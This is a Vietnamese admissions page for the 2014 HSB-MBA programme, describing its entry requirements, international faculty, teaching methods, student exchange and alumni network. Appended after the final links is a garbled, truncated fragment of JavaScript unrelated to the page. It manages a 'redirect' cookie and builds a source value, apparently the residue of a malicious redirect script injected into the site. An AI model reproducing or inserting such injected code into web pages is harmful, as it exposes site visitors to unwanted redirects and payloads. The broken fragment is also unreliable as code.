Tuyển sinh Chương trình đào tạo Thạc sỹ Quản trị Kinh doanh (HSB-MBA), giảng dạy bằng tiếng Anh, Khóa 9, năm 2014

HSBMBA-1Đây là chương trình MBA được HSB thiết kế và giảng dạy 100% bằng tiếng Anh trên cơ sở hợp tác với Trường KInh doanh Đại học Queensland, phù hợp với bối cảnh kinh tế của Việt Nam và Châu Á. HSB-MBA là chương trình đạo tạo thạc sỹ Quản trị Kinh doanh chính quy (chuẩn quốc tế) duy nhất, gồm 58 tín chỉ và là chương trình MBA nhiều tín chỉ nhất tại Việt Nam. 

 

GIỚI THIỆU VỀ CHƯƠNG TRÌNH

ĐÀO TẠO THẠC SĨ QUẢN TRỊ QUẢN TRỊ KINH DOANH (CHUẨN QUỐC TẾ) HSB-MBA

Đây là chương trình MBA được HSB thiết kế và giảng dạy 100% bằng tiếng Anh trên cơ sở hợp tác với Trường KInh doanh Đại học Queensland, phù hợp với bối cảnh kinh tế của Việt Nam và Châu Á. HSB-MBA là chương trình đạo tạo thạc sỹ Quản trị Kinh doanh chính quy (chuẩn quốc tế) duy nhất, gồm 58 tín chỉ và là chương trình MBA nhiều tín chỉ nhất tại Việt Nam. Thời gian học kéo dài trong 16-22 tháng với chất lượng đào tạo đảm bảo. Học viên sẽ được tiếp thu một khối lượng kiến thức lớn và những kỹ năng cần thiết để đối mặt với những khó khăn thử thách của công việc trong tương lai. Học viên sẽ nhận được sự hỗ trợ và hướng dẫn tốt nhất từ các giảng viên HSB và nhiều doanh nghiệp Việt Nam cũng như sự tư vấn, khích lệ và chia sẻ từ bạn bè trong lớp.

Điều kiện đầu vào của chương trình là thí sinh phải có bằng tốt nghiệp đại học (các ngành theo thông báo tuyển sinh), có trình độ tiếng Anh B2 hoặc tường đương IELTS 5.5 trở lên và thi kiểm tra môn GRE kết hợp với phỏng vấn và đánh giá hồ sơ thí sinh.

Chương trình có những điểm nổi bật mang lại giá trị vượt trội:

– Tiêu chuẩn quốc tế: HSB là tổ chức giáo dục duy nhất của Việt Nam được công nhận là thành viên của Hiệp hội các trường Kinh doanh Châu Á Thái Bình Dương (AAPBS). Được sự hỗ trợ và hợp tác lâu dài của ĐH Queensland, HSB cam kết tuân thủ những tiêu chuẩn khắt khe về chất lượng đào tạo theo chuẩn đầu ra của chương trình.

– Giảng viên quốc tế: Chương trình có sự tham gia giảng dạy của cả những giáo sư Việt Nam và quốc tế. HSB có lực lượng giảng viên cơ hữu gồm nhiều giáo sư người nước ngoài cùng với các giảng viên thỉnh giảng đến từ các nước như Ausralia, Mỹ, Châu Âu và các quốc gia khác trên thế giới. Tất cả các giàng viên tham gia giảng dạy trong các chương trình của HSB đều có bằng quốc tế được công nhận rộng rãi trên thế giới.

– Phương pháp giảng dạy: Đội ngũ giảng viên của chương trình HSB-MBA luôn tâm huyết xây dựng một chương trình đào tạo có tính thực tiễn cao để giúp học viên có thể áp dụng ngay những kiến thức được học vào môi trường làm việc. Đặc biệt HSB luôn chú trọng tăng cường trao đổi và thảo luận giữa các học viên thông qua những dự án nghiên cứu theo nhóm và cá nhân, giúp học viên có cơ hội học tập và nghiên cứu chuyên sâu. Những bài tập tình huống thực tiễn (cá nhân và nhóm), dự án nhỏ, những bài thuyết trình và tiểu luận giúp học viên áp dụng những khái niệm, công vụ và kỹ năng thu được trên lớp để ứng dụng một cách hiệu quả vào công việc của mình. Ngoài ra, trong chương trình học, giảng viên còn cung cấp nhiều ví dụ minh họa sinh động như video, thảo luận, bài tập tình huống, xây dựng nhóm học tập và hướng dẫn học viên tiếp cận với những kiến thức hiện đại về mặt công nghệ.

2C Game: HSB áp dụng tối đa quy tắc “2C Game” (hợp tác và cạnh tranh) để khuyến khích học viên học tập một cách tốt nhất.

– Trao đổi sinh viên quốc tế: HSB là một môi trường quốc tế, học viên tham gia các chương trình tại HSB có cơ hội được trao đổi sinh viên quốc tế với nhiều đối tác nước ngoài. Những học viên và cựu học viên của HSB không chỉ là những doanh nhân thành đạt ở Việt Nam mà còn những học viên nổi bật và chuyên gia đến từ Mỹ, Úc, Nhật, và Châu Âu. Nghiên cứu đã chỉ ra rằng phần trăm đáng kể những kiến thức thu được của một chương trình MBA phụ thuộc vào chính bản thân học viên. Vì vậy, sự hiện diện của những sinh viên quốc tế là một đặc điểm nổi bật của chương trình HSB-MBA.

Cơ hội kết nối với cộng đồng doanh nghiệp: Khi trở thành học viên HSB-MBA, bạn sẽ trở thành thành viên của mạng lưới MBA tốt nhất và rộng khắp tại Việt Nam. Mỗi năm có hơn 300 học viên MBA tốt nghiệp ra nhập gia đình cựu học viên của chúng tôi. Hơn 10.000 cựu học viên bao gồm các chủ tịch, CEO của các doanh nghiệp hàng đầu Việt Nam được kết nối với nhau bởi mạng lưới cựu học viên vững mạnh. Có nhiều hoạt động giúp gắn kết các cựu học viên với nhau như tìm kiếm nguồn lực, cộng đồng mạng, tuyển dụng… và nhiều hoạt động khác để duy trì quan hệ cộng đồng này.

Thông tin Tuyển sinh Chương trình vui lòng truy cập:   Link1, Link2

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’